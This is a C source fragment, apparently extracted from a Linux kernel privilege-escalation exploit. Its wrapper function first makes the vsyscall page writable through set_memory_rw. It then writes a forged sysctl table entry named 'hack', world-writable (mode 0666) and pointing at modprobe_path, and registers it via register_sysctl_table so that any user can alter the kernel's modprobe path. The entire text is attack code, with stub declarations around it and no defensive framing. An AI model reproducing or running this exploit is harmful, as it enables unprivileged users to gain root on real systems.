
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct ctl_table {char* procname; int mode; int maxlen; void* extra2; void* extra1; void* data; void* proc_handler; } ;
struct TYPE_2__ {int register_sysctl_table; scalar_t__ modprobe_path; scalar_t__ proc_dostring; int set_memory_rw; } ;


 scalar_t__ VSYSCALL ;
 int exploit (int ,scalar_t__,int ) ;
 int fprintf (int ,char*) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 TYPE_1__* off ;
 int printf (char*) ;
 int sleep (int) ;
 int stderr ;
 int strcpy (char*,char*) ;
 int verify_stage1 ;
 int verify_stage2 ;

void wrapper(void)
{
    struct ctl_table *c;

    fprintf(stderr,"exploit starting\n");
    printf("making vsyscall page writable..\n\n");

    exploit(off->set_memory_rw, VSYSCALL, verify_stage1);

    printf("\nstage 1 completed\n");

    sleep(5);

    printf("registering new sysctl..\n\n");

    c = (struct ctl_table *)(VSYSCALL+0x850);

    memset((char *)(VSYSCALL+0x850), '\x00', 1952);

    strcpy((char *)(VSYSCALL+0xf00),"hack");
    memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;
    c->proc_handler = (void *)(off->proc_dostring);
    c->data = (void *)(off->modprobe_path);
    c->maxlen=256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);

    exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);

    printf("stage 2 completed\n");
}
